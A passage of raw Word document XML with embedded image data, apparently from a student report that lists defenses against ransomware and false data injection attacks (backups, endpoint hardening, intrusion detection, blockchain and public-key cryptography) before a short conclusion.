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k6yp9ewQAAKYRAAAOAAAAAAAA&#10;AAAAAAAAAD0CAABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQDybURybC8BAGwvAQAUAAAA&#10;AAAAAAAAAAAAAOQGAABkcnMvbWVkaWEvaW1hZ2UxLmpwZ1BLAQItAAoAAAAAAAAAIQB601rSDW8A&#10;AA1vAAAUAAAAAAAAAAAAAAAAAII2AQBkcnMvbWVkaWEvaW1hZ2UyLmpwZ1BLAQItABQABgAIAAAA&#10;IQAbdN/73QAAAAYBAAAPAAAAAAAAAAAAAAAAAMGlAQBkcnMvZG93bnJldi54bWxQSwECLQAUAAYA&#10;CAAAACEAe8A4ksMAAAClAQAAGQAAAAAAAAAAAAAAAADLpgEAZHJzL19yZWxzL2Uyb0RvYy54bWwu&#10;cmVsc1BLBQYAAAAABwAHAL4BAADFpwEAAAA=&#10;">
                <v:rect id="Rectangle 6929" o:spid="_x0000_s1420" style="position:absolute;left:59192;top:324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14:paraId="16D023E9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6930" o:spid="_x0000_s1421" style="position:absolute;left:59192;top:661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14:paraId="3F5EBD8D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 6934" o:spid="_x0000_s1422" type="#_x0000_t75" style="position:absolute;left:127;top:127;width:58737;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BGxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTe6q61hBpdRYSKl0Kj1fMj+0yi2bdpdmvSf98VBI/DzHzDzJe9rcWVWl851jAeKRDE&#10;uTMVFxq+9x8v7yB8QDZYOyYNf+RhuRg8zTE1ruOMrrtQiAhhn6KGMoQmldLnJVn0I9cQR+/kWosh&#10;yraQpsUuwm0tX5VKpMWK40KJDa1Lyi+7X6vhbA6rY9b9fKpNNcnVJuvG2+RL6+dhv5qBCNSHR/je&#10;3hoNyXTyBrc38QnIxT8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAh+ygRsYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId156" o:title=""/>
                </v:shape>
                <v:shape id="Shape 6935" o:spid="_x0000_s1423" style="position:absolute;width:58991;height:33553;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5899150,335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fwgxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvQv9DeIXeNGuLtq5GkS2i166l5+fmmV3cvCxJqrv/vhGEHoeZ+YZZbXrbiiv50DhWMJ1kIIgr&#10;pxs2Cr6Pu/EHiBCRNbaOScFAATbrp9EKc+1u/EXXMhqRIBxyVFDH2OVShqomi2HiOuLknZ23GJP0&#10;RmqPtwS3rXzNsrm02HBaqLGjoqbqUv5aBdtPszPvxXAe9if/085iubBDodTLc79dgojUx//wo33Q&#10;CuaLtxnc36QnINd/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAM+J/CDEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,3355340r5899150,l5899150,,,,,3355340xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3355340"/>
                </v:shape>
                <v:shape id="Picture 6937" o:spid="_x0000_s1424" type="#_x0000_t75" style="position:absolute;left:127;top:34226;width:58737;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QRgxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/dagIx&#10;FITvC75DOELvalYL1q5GUaFooSBuBW8Pm7M/uDlZk9Td9umbQsHLYWa+YRar3jTiRs7XlhWMRwkI&#10;4tzqmksFp8+3pxkIH5A1NpZJwTd5WC0HDwtMte34SLcslCJC2KeooAqhTaX0eUUG/ci2xNErrDMY&#10;onSl1A67CDeNnCTJVBqsOS5U2NK2ovySfRkFOH6fbdyhKz5O120x8T+c7dxZqcdhv56DCNSHe/i/&#10;vdcKpq/PL/D3Jj4BufwFAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAfUkEYMYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId157" o:title=""/>
                </v:shape>
                <v:shape id="Shape 6938" o:spid="_x0000_s1425" style="position:absolute;top:34099;width:58991;height:33293;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5899150,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QxwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LasJA&#10;FN0X+g/DLbirEx+ENDqKWCsu06RQ3F0y1ySYuRMyU5P+vbMQXB7Oe70dTStu1LvGsoLZNAJBXFrd&#10;cKXgp/h6T0A4j6yxtUwK/snBdvP6ssZU24G/6Zb7SoQQdikqqL3vUildWZNBN7UdceAutjfoA+wr&#10;qXscQrhp5TyKYmmw4dBQY0f7mspr/mcUHIb5rz9nx2syu1jdLatPXmSFUpO3cbcC4Wn0T/HDfdIK&#10;4o9FmBvehCcgN3cAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEATU10McMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="552D801F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D98FECD" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0173DAA3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="52"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ransomware Attack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549762B9"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Maintain Backups </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB3464C"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Develop plans and policies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9CB6E9"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Review port settings </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D21F8A9"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Harden your endpoints </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4D5A70"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Keep systems up-to-date </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71935C04" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Train the team </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement the IDS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3E03C8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F23F317" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1886"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="-15"/>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Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">False Data Injection Attack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71316E41" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5" w:line="243" w:lineRule="auto"/>
        <w:ind w:left="355" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251744256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7FAE4ECD" wp14:editId="5D11FAAB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44602" name="Group 4460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00" name="Shape 5020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01" name="Shape 5020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02" name="Shape 5020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03" name="Shape 5020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04" name="Shape 5020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02" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50205" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50206" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50207" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50208" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 5020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15CA570D" wp14:editId="0E7A5AE7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44603" name="Group 44603"/>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10" name="Shape 5021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1" name="Shape 5021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12" name="Shape 5021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3" name="Shape 5021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14" name="Shape 5021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03" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50215" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50216" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50217" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50218" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 5021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sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The blockchain has recently seen favourable adoption as it enforces data authenticity. The decentralized nature and cryptographic authentication mechanisms of the blockchain security model provide a better safeguard against FDIA attacks. Implementing this model helps prevent false image injection attacks in healthcare and reduce forgery attacks for transactions on power systems. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105F9699" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="12"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E211D1C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="39" w:line="243" w:lineRule="auto"/>
        <w:ind w:left="355" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptographic operations and algorithms can guard the integrity of IoT network measurements. Public key cryptographic algorithms, such as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>McEliece</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> public key system, are ideal for identifying and nullifying data supplied through FDIA attack strategies. It is also recommended that the cryptographic algorithm is chosen carefully as complex ones bring up computational overhead. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1766977D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CE417E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B3699F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7D359" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A3EE53" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFABCB2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc48953"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CONCLUSION :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="7A25CAA2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB9E1E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="238" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We have now covered about the explanation of our system, all the 4 attacks and ways to prevent it. These 4 attacks are still prevalent in the IT industry and it is our responsibility, as developers, to take care of all these attacks while building these systems and taking preventive measures if any such attacks are done on it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024DA2B8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77681AB2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc48954"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>REFERENCES :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
